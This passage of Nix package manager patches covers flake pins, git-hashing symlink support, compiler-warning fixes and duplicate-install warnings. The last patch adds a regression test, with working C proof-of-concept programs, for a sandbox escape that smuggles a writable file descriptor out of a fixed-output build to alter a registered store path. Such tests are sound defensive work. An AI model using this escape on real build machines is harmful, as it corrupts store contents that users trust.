+        "treeHash": "74223e48f0b0e94ecf419d793c67068cdfdf5ea0",
         "type": "github"
       },
       "original": {
         "owner": "NixOS",
-        "ref": "nixos-23.11-small",
+        "ref": "release-23.11",
         "repo": "nixpkgs",
         "type": "github"
       }
diff --git a/flake.nix b/flake.nix
index ceb572c0b..58d17bf00 100644
--- a/flake.nix
+++ b/flake.nix
@@ -1,7 +1,9 @@
 {
   description = "The purely functional package manager";
 
-  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.11-small";
+  # TODO switch to nixos-23.11-small
+  #      https://nixpk.gs/pr-tracker.html?pr=291954
+  inputs.nixpkgs.url = "github:NixOS/nixpkgs/release-23.11";
   inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2";
   inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; };
   inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; };

From 8dc4b41c7f748d1615dbcf2c3438d1a76a5cb295 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 28 Feb 2024 02:34:43 +0100
Subject: [PATCH 531/654] flake.lock: Strip out treeHash. Too soon...

I hate this.
We should have it, but for now we can't.
---
 flake.lock | 1 -
 1 file changed, 1 deletion(-)

diff --git a/flake.lock b/flake.lock
index 3070b4a45..bb2e400c0 100644
--- a/flake.lock
+++ b/flake.lock
@@ -39,7 +39,6 @@
         "owner": "NixOS",
         "repo": "nixpkgs",
         "rev": "b550fe4b4776908ac2a861124307045f8e717c8e",
-        "treeHash": "74223e48f0b0e94ecf419d793c67068cdfdf5ea0",
         "type": "github"
       },
       "original": {

From 6147d27afb7200b972338abf1be1523740773df9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 07:10:53 +0100
Subject: [PATCH 532/654] Bump the required daemon version for the git hashing
 tests

The required version check was a bit too lenient, and
`nixpkgs#nixUnstable` was considered valid while it didn't have the fix.
---
 tests/functional/git-hashing/common.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/functional/git-hashing/common.sh b/tests/functional/git-hashing/common.sh
index 5de96e74f..572cea438 100644
--- a/tests/functional/git-hashing/common.sh
+++ b/tests/functional/git-hashing/common.sh
@@ -4,7 +4,7 @@ clearStore
 clearCache
 
 # Need backend to support git-hashing too
-requireDaemonNewerThan "2.18.0pre20230908"
+requireDaemonNewerThan "2.19"
 
 enableFeatures "git-hashing"
 

From da90be789d8074880d95405a439b446c60947506 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 08:00:17 +0100
Subject: [PATCH 533/654] Fix a too smart implicit cast

Apparently gcc is able to implicitly cast from `FileIngestionMethod` to
`ContentAddressMethod`, but clang isn't. So explicit the cast
---
 src/libstore/local-store.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
index 56f8c5dd8..1bbeaa912 100644
--- a/src/libstore/local-store.cc
+++ b/src/libstore/local-store.cc
@@ -1202,7 +1202,7 @@ StorePath LocalStore::addToStoreFromDump(
     Path tempDir;
     AutoCloseFD tempDirFd;
 
-    bool methodsMatch = (FileIngestionMethod) dumpMethod == hashMethod;
+    bool methodsMatch = ContentAddressMethod(FileIngestionMethod(dumpMethod)) == hashMethod;
 
     /* If the methods don't match, our streaming hash of the dump is the
        wrong sort, and we need to rehash. */

From f6142cd0d1b248581adddbbc1056df00fe12eb3b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 08:02:49 +0100
Subject: [PATCH 534/654] unset `NIX_HARDENING_ENABLE` in fast build mode

`NIX_HARDENING_ENABLE` causes `_FORTIFY_SOURCE` to be defined.
This isn't compatible with `-O0`, and the compiler will happily remind
us about it at every call, spamming the terminal with warnings and stack
traces.

We don't really care about hardening in that case, so just disable it if we
pass `OPTIMIZE=0`.
---
 Makefile  | 1 +
 flake.nix | 1 +
 2 files changed, 2 insertions(+)

diff --git a/Makefile b/Makefile
index 745e60aa5..c3dc83c77 100644
--- a/Makefile
+++ b/Makefile
@@ -68,6 +68,7 @@ ifeq ($(OPTIMIZE), 1)
   GLOBAL_LDFLAGS += $(CXXLTO)
 else
   GLOBAL_CXXFLAGS += -O0 -U_FORTIFY_SOURCE
+  unexport NIX_HARDENING_ENABLE
 endif
 
 include mk/platform.mk
diff --git a/flake.nix b/flake.nix
index 58d17bf00..42aaace67 100644
--- a/flake.nix
+++ b/flake.nix
@@ -396,6 +396,7 @@
             # Make bash completion work.
             XDG_DATA_DIRS+=:$out/share
           '';
+
           nativeBuildInputs = attrs.nativeBuildInputs or []
             # TODO: Remove the darwin check once
             # https://github.com/NixOS/nixpkgs/pull/291814 is available

From bcb5f235f963d3e213c3dbe104be91a9a0a6dd29 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Wed, 28 Feb 2024 10:56:07 -0500
Subject: [PATCH 535/654] Support symlinks properly with `git-hashing`
 experimental feature

Before, they would not be written to a file `FileSystemObjectSink`
correctly.
---
 src/libutil/git.cc                     |  75 +++++++++++++++++++------
 src/libutil/git.hh                     |  21 ++++++-
 tests/functional/git-hashing/simple.sh |   9 +++
 tests/unit/libutil/data/git/tree.bin   | Bin 100 -> 133 bytes
 tests/unit/libutil/data/git/tree.txt   |   1 +
 tests/unit/libutil/git.cc              |  30 ++++++++--
 6 files changed, 110 insertions(+), 26 deletions(-)

diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 5733531fa..0b6e35222 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -56,31 +56,63 @@ void parseBlob(
     FileSystemObjectSink & sink,
     const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode blobMode,
     const ExperimentalFeatureSettings & xpSettings)
 {
     xpSettings.require(Xp::GitHashing);
 
-    sink.createRegularFile(sinkPath, [&](auto & crf) {
-        if (executable)
-            crf.isExecutable();
+    unsigned long long size = std::stoi(getStringUntil(source, 0));
 
-        unsigned long long size = std::stoi(getStringUntil(source, 0));
+    auto doRegularFile = [&](bool executable) {
+        sink.createRegularFile(sinkPath, [&](auto & crf) {
+            if (executable)
+                crf.isExecutable();
 
-        crf.preallocateContents(size);
+            crf.preallocateContents(size);
 
-        unsigned long long left = size;
-        std::string buf;
-        buf.reserve(65536);
+            unsigned long long left = size;
+            std::string buf;
+            buf.reserve(65536);
 
-        while (left) {
+            while (left) {
+                checkInterrupt();
+                buf.resize(std::min((unsigned long long)buf.capacity(), left));
+                source(buf);
+                crf(buf);
+                left -= buf.size();
+            }
+        });
+    };
+
+    switch (blobMode) {
+
+    case BlobMode::Regular:
+        doRegularFile(false);
+        break;
+
+    case BlobMode::Executable:
+        doRegularFile(true);
+        break;
+
+    case BlobMode::Symlink:
+    {
+        std::string target;
+        target.resize(size, '0');
+        target.reserve(size);
+        for (size_t n = 0; n < target.size();) {
             checkInterrupt();
-            buf.resize(std::min((unsigned long long)buf.capacity(), left));
-            source(buf);
-            crf(buf);
-            left -= buf.size();
+            n += source.read(
+                const_cast<char *>(target.c_str()) + n,
+                target.size() - n);
         }
-    });
+
+        sink.createSymlink(sinkPath, target);
+        break;
+    }
+
+    default:
+        assert(false);
+    }
 }
 
 void parseTree(
@@ -142,7 +174,7 @@ void parse(
     FileSystemObjectSink & sink,
     const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode rootModeIfBlob,
     std::function hook,
     const ExperimentalFeatureSettings & xpSettings)
 {
@@ -152,7 +184,7 @@ void parse(
 
     switch (type) {
     case ObjectType::Blob:
-        parseBlob(sink, sinkPath, source, executable, xpSettings);
+        parseBlob(sink, sinkPath, source, rootModeIfBlob, xpSettings);
         break;
     case ObjectType::Tree:
         parseTree(sink, sinkPath, source, hook, xpSettings);
@@ -177,7 +209,7 @@ std::optional convertMode(SourceAccessor::Type type)
 
 void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
 {
-    parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
+    parse(sink, "", source, BlobMode::Regular, [&](Path name, TreeEntry entry) {
         auto [accessor, from] = hook(entry.hash);
         auto stat = accessor->lstat(from);
         auto gotOpt = convertMode(stat.type);
@@ -275,6 +307,13 @@ Mode dump(
     }
 
     case SourceAccessor::tSymlink:
+    {
+        auto target = accessor.readLink(path);
+        dumpBlobPrefix(target.size(), sink, xpSettings);
+        sink(target);
+        return Mode::Symlink;
+    }
+
     case SourceAccessor::tMisc:
     default:
         throw Error("file '%1%' has an unsupported type", path);
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index d9eb138e1..cfea48fbe 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -75,10 +75,23 @@ ObjectType parseObjectType(
     Source & source,
     const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
 
+/**
+ * These 3 modes are represented by blob objects.
+ *
+ * Sometimes we need this information to disambiguate how a blob is
+ * being used to better match our own "file system object" data model.
+ */
+enum struct BlobMode : RawMode
+{
+    Regular = static_cast<RawMode>(Mode::Regular),
+    Executable = static_cast<RawMode>(Mode::Executable),
+    Symlink = static_cast<RawMode>(Mode::Symlink),
+};
+
 void parseBlob(
     FileSystemObjectSink & sink, const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode blobMode,
     const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
 
 void parseTree(
@@ -89,11 +102,15 @@ void parseTree(
 
 /**
  * Helper putting the previous three `parse*` functions together.
+ *
+ * @rootModeIfBlob How to interpret a root blob, for which there is no
+ * disambiguating dir entry to answer that question. If the root is not
+ * a blob, this is ignored.
  */
 void parse(
     FileSystemObjectSink & sink, const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode rootModeIfBlob,
     std::function hook,
     const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
 
diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
index 74b0220f8..604e1a175 100644
--- a/tests/functional/git-hashing/simple.sh
+++ b/tests/functional/git-hashing/simple.sh
@@ -56,3 +56,12 @@ echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
 path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
 hash3=$(nix-store -q --hash $path3)
 test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
+
+rm -rf $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3/dir
+touch $TEST_ROOT/dummy3/dir/file
+ln -s './hello/world.txt' $TEST_ROOT/dummy3/dir/symlink
+path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
+hash3=$(nix-store -q --hash $path3)
+test "$hash3" = "sha256:1dwazas8irzpar89s8k2bnp72imfw7kgg4aflhhsfnicg8h428f3"
diff --git a/tests/unit/libutil/data/git/tree.bin b/tests/unit/libutil/data/git/tree.bin
index 5256ec140702fef5f88bd5750caf7cd57c03e5ac..4ccd43e9a977a6c216f0fad5a15c30aaf20da778 100644
GIT binary patch
delta 30
jcmYdkW#lL+N=;QTG%}gU9?NZLWB>#Tg{7qt6AeWHezyoG

delta 14
VcmZo=Okpo6N=;R;G@8f}3jiOO1S0?d

diff --git a/tests/unit/libutil/data/git/tree.txt b/tests/unit/libutil/data/git/tree.txt
index be3d02920..cd40b6a55 100644
--- a/tests/unit/libutil/data/git/tree.txt
+++ b/tests/unit/libutil/data/git/tree.txt
@@ -1,3 +1,4 @@
 100644 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2	Foo
 100755 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2	bAr
 040000 tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904	baZ
+120000 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2	quuX
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 76ef86bcf..4f92488d6 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -67,7 +67,7 @@ TEST_F(GitTest, blob_read) {
         StringSink out;
         RegularFileSink out2 { out };
         ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
-        parseBlob(out2, "", in, false, mockXpSettings);
+        parseBlob(out2, "", in, BlobMode::Regular, mockXpSettings);
 
         auto expected = readFile(goldenMaster("hello-world.bin"));
 
@@ -115,6 +115,15 @@ const static Tree tree = {
             .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
         },
     },
+    {
+        "quuX",
+        {
+            .mode = Mode::Symlink,
+            // hello world with special chars from above (symlink target
+            // can be anything)
+            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+        },
+    },
 };
 
 TEST_F(GitTest, tree_read) {
@@ -165,6 +174,12 @@ TEST_F(GitTest, both_roundrip) {
                                 .contents = "good day,\n\0\n\tworld!",
                             },
                         },
+                        {
+                            "quux",
+                            File::Symlink {
+                                .target = "/over/there",
+                            },
+                        },
                     },
                 },
             },
@@ -195,21 +210,24 @@ TEST_F(GitTest, both_roundrip) {
 
     MemorySink sinkFiles2 { files2 };
 
-    std::function mkSinkHook;
-    mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
+    std::function mkSinkHook;
+    mkSinkHook = [&](auto prefix, auto & hash, auto blobMode) {
         StringSource in { cas[hash] };
         parse(
-            sinkFiles2, prefix, in, executable,
+            sinkFiles2, prefix, in, blobMode,
             [&](const Path & name, const auto & entry) {
                 mkSinkHook(
                     prefix + "/" + name,
                     entry.hash,
-                    entry.mode == Mode::Executable);
+                    // N.B. this cast would not be acceptable in real
+                    // code, because it would make an assert reachable,
+                    // but it should be harmless in this test.
+                    static_cast<BlobMode>(entry.mode));
             },
             mockXpSettings);
     };
 
-    mkSinkHook("", root.hash, false);
+    mkSinkHook("", root.hash, BlobMode::Regular);
 
     ASSERT_EQ(files, files2);
 }

From 4d769e7a76bee1e8c967f20d72eb5f3a357577ee Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 28 Feb 2024 19:54:17 +0100
Subject: [PATCH 536/654] actions docker_push_image: Update nix 2.13.3 ->
 2.20.3

---
 .github/workflows/ci.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 38126dd68..2aa3a3300 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -64,7 +64,7 @@ jobs:
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
     - uses: cachix/install-nix-action@v25
       with:
-        install_url: https://releases.nixos.org/nix/nix-2.13.3/install
+        install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - uses: cachix/cachix-action@v14
       with:
         name: '${{ env.CACHIX_NAME }}'
@@ -116,7 +116,7 @@ jobs:
         fetch-depth: 0
     - uses: cachix/install-nix-action@v25
       with:
-        install_url: https://releases.nixos.org/nix/nix-2.13.3/install
+        install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
     - run: echo NIX_VERSION="$(nix --experimental-features 'nix-command flakes' eval .\#default.version | tr -d \")" >> $GITHUB_ENV
     - uses: cachix/cachix-action@v14

From f6158ea53b90a60899ee8171c04dc1f978fb8723 Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 00:30:51 -0800
Subject: [PATCH 537/654] finally.hh: include works by itself; mark as
 nodiscard

---
 src/libutil/finally.hh | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/src/libutil/finally.hh b/src/libutil/finally.hh
index db654301f..4cae20a36 100644
--- a/src/libutil/finally.hh
+++ b/src/libutil/finally.hh
@@ -1,11 +1,13 @@
 #pragma once
 ///@file
 
+#include 
+
 /**
  * A trivial class to run a function at the end of a scope.
  */
 template
-class Finally
+class [[nodiscard("Finally values must be used")]] Finally
 {
 private:
     Fn fun;

From 65bb12ba78c7cef975515e025c72cf68b7e738b3 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 28 Feb 2024 22:59:20 +0100
Subject: [PATCH 538/654] Fix gcc 12 warnings

---
 src/libstore/build-result.hh                | 5 +++++
 src/libstore/build/local-derivation-goal.cc | 1 +
 src/libstore/daemon.cc                      | 2 ++
 src/libstore/remote-store.cc                | 2 ++
 src/libutil/file-content-address.cc         | 2 +-
 5 files changed, 11 insertions(+), 1 deletion(-)

diff --git a/src/libstore/build-result.hh b/src/libstore/build-result.hh
index 8840fa7e3..3636ad3a4 100644
--- a/src/libstore/build-result.hh
+++ b/src/libstore/build-result.hh
@@ -123,6 +123,11 @@ struct KeyedBuildResult : BuildResult
      * The derivation we built or the store path we substituted.
      */
     DerivedPath path;
+
+    // Hack to work around a gcc "may be used uninitialized" warning.
+    KeyedBuildResult(BuildResult res, DerivedPath path)
+        : BuildResult(std::move(res)), path(std::move(path))
+    { }
 };
 
 }
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b8de123..c7a658361 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2480,6 +2480,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                         CanonPath { tmpDir + "/tmp" }).hash;
                 }
                 }
+                assert(false);
             }();
 
             ValidPathInfo newInfo0 {
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index e1337f51d..917813342 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -415,6 +415,8 @@ static void performOp(TunnelLogger * logger, ref store,
                     // Use NAR; Git is not a serialization method
                     dumpMethod = FileSerialisationMethod::Recursive;
                     break;
+                default:
+                    assert(false);
                 }
                 // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
                 auto path = store->addToStoreFromDump(source, name, dumpMethod, contentAddressMethod, hashAlgo, refs, repair);
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index 8dfe8adda..09196481b 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -527,6 +527,8 @@ StorePath RemoteStore::addToStoreFromDump(
         // Use NAR; Git is not a serialization method
         fsm = FileSerialisationMethod::Recursive;
         break;
+    default:
+        assert(false);
     }
     if (fsm != dumpMethod)
         unsupported("RemoteStore::addToStoreFromDump doesn't support this `dumpMethod` `hashMethod` combination");
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 471bda6a0..570247b9e 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -123,7 +123,7 @@ Hash hashPath(
     case FileIngestionMethod::Git:
         return git::dumpHash(ht, accessor, path, filter).hash;
     }
-
+    assert(false);
 }
 
 }

From 14adff17113dd2d4c0eb6c540a74308019829866 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Mon, 26 Feb 2024 21:09:17 +0100
Subject: [PATCH 539/654] profile install: skip and warn on installing package
 twice

---
 src/nix/profile.cc              | 21 ++++++++++++++++++++-
 tests/functional/nix-profile.sh |  3 +++
 2 files changed, 23 insertions(+), 1 deletion(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index e04ae008d..d39a24d36 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -395,7 +395,26 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
 
             element.updateStorePaths(getEvalStore(), store, res);
 
-            manifest.addElement(std::move(element));
+            auto elementName = getNameFromElement(element);
+
+            // Check if the element already exists.
+            auto existingPair = manifest.elements.find(elementName);
+            if (existingPair != manifest.elements.end()) {
+                auto existingElement = existingPair->second;
+                auto existingSource = existingElement.source;
+                auto elementSource = element.source;
+                if (existingSource
+                    && elementSource
+                    && existingElement.priority == element.priority
+                    && existingSource->originalRef == elementSource->originalRef
+                    && existingSource->attrPath == elementSource->attrPath
+                    ) {
+                    warn("'%s' is already installed", elementName);
+                    continue;
+                }
+            }
+
+            manifest.addElement(elementName, std::move(element));
         }
 
         try {
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 88b713d53..ee93251e9 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -64,6 +64,9 @@ nix profile install $flake1Dir
 [[ $($TEST_HOME/.local/state/nix/profile/bin/hello) = "Hello World" ]]
 unset NIX_CONFIG
 
+# Test conflicting package install.
+nix profile install $flake1Dir 2>&1 | grep "warning: 'flake1' is already installed"
+
 # Test upgrading a package.
 printf NixOS > $flake1Dir/who
 printf 2.0 > $flake1Dir/version

From a55c6a0f4749084a5d85bb90a2de2b08349b6f37 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Mon, 12 Feb 2024 21:28:20 +0100
Subject: [PATCH 540/654] Add a NixOS test for the sandbox escape

Test that we can't leverage abstract unix domain sockets to leak file
descriptors out of the sandbox and modify the path after it has been
registered.
---
 tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++
 tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
 tests/nixos/ca-fd-leak/smuggler.c  | 66 ++++++++++++++++++++++
 tests/nixos/default.nix            |  4 +-
 4 files changed, 224 insertions(+), 1 deletion(-)
 create mode 100644 tests/nixos/ca-fd-leak/default.nix
 create mode 100644 tests/nixos/ca-fd-leak/sender.c
 create mode 100644 tests/nixos/ca-fd-leak/smuggler.c

diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 000000000..40e57ea02
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,90 @@
+# Nix is a sandboxed build system. But not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ config, ... }:
+
+let
+  pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+  # Simple C program that sends a file descriptor to `$out` to a Unix
+  # domain socket.
+  # Compiled statically so that we can easily send it to the VM and use it
+  # inside the build sandbox.
+  sender = pkgs.runCommandWith {
+    name = "sender";
+    stdenv = pkgs.pkgsStatic.stdenv;
+  } ''
+    $CC -static -o $out ${./sender.c}
+  '';
+
+  # Okay, so we have a file descriptor shipped out of the FOD now. But the
+  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+  # lives in a mount namespace where it is not! So even when this file exists
+  # in the actual Nix store, we're capable of just modifying its contents...
+  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+  # The abstract socket path used to exfiltrate the file descriptor
+  socketName = "FODSandboxExfiltrationSocket";
+in
+{
+  name = "ca-fd-leak";
+
+  nodes.machine =
+    { config, lib, pkgs, ... }:
+    { virtualisation.writableStore = true;
+      nix.settings.substituters = lib.mkForce [ ];
+      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+    };
+
+  testScript = { nodes }: ''
+    start_all()
+
+    machine.succeed("echo hello")
+    # Start the smuggler server
+    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+    # Build the smuggled derivation.
+    # This will connect to the smuggler server and send it the file descriptor
+    machine.succeed(r"""
+      nix-build -E '
+        builtins.derivation {
+          name = "smuggled";
+          system = builtins.currentSystem;
+          # look ma, no tricks!
+          outputHashMode = "flat";
+          outputHashAlgo = "sha256";
+          outputHash = builtins.hashString "sha256" "hello, world\n";
+          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+      }'
+    """.strip())
+
+
+    # Tell the smuggler server that we're done
+    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+    # Check that the file was modified
+    machine.succeed(r"""
+      cat ./result
+      test "$(cat ./result)" = "hello, world"
+    """.strip())
+  '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 000000000..75e54fc8f
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <string.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Set up an abstract domain socket path to connect to.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+
+    // Now try to connect. To ensure we work no matter what order we are
+    // executed in, just busyloop here.
+    int res = -1;
+    while (res < 0) {
+        res = connect(sock, (const struct sockaddr *)&data,
+            offsetof(struct sockaddr_un, sun_path)
+              + strlen(argv[1])
+              + 1);
+        if (res < 0 && errno != ECONNREFUSED) perror("connect");
+        if (errno != ECONNREFUSED) break;
+    }
+
+    // Write our message header.
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Write an SCM_RIGHTS message containing the output path.
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    hdr->cmsg_len = CMSG_LEN(sizeof(int));
+    hdr->cmsg_level = SOL_SOCKET;
+    hdr->cmsg_type = SCM_RIGHTS;
+    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+    msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+    // Write a single null byte too.
+    msg.msg_iov = malloc(sizeof(struct iovec));
+    msg.msg_iov[0].iov_base = "";
+    msg.msg_iov[0].iov_len = 1;
+    msg.msg_iovlen = 1;
+
+    // Send it to the other side of this connection.
+    res = sendmsg(sock, &msg, 0);
+    if (res < 0) perror("sendmsg");
+    int buf;
+
+    // Wait for the server to close the socket, implying that it has
+    // received the command.
+    recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 000000000..82acf37e6
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Bind to the socket.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+    int res = bind(sock, (const struct sockaddr *)&data,
+        offsetof(struct sockaddr_un, sun_path)
+        + strlen(argv[1])
+        + 1);
+    if (res < 0) perror("bind");
+
+    res = listen(sock, 1);
+    if (res < 0) perror("listen");
+
+    int smuggling_fd = -1;
+
+    // Accept the connection a first time to receive the file descriptor.
+    fprintf(stderr, "%s\n", "Waiting for the first connection");
+    int a = accept(sock, 0, 0);
+    if (a < 0) perror("accept");
+
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Receive the file descriptor as sent by the smuggler.
+    recvmsg(a, &msg, 0);
+
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    while (hdr) {
+        if (hdr->cmsg_level == SOL_SOCKET
+          && hdr->cmsg_type == SCM_RIGHTS) {
+
+            // Grab the copy of the file descriptor.
+            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+        }
+
+        hdr = CMSG_NXTHDR(&msg, hdr);
+    }
+    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+    close(a);
+
+    // Wait for a second connection, which will tell us that the build is
+    // done
+    a = accept(sock, 0, 0);
+    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+    // Write a new content to the file
+    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+    char * new_content = "Pwned\n";
+    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+    if (written_bytes != strlen(new_content)) perror("write");
+}
diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix
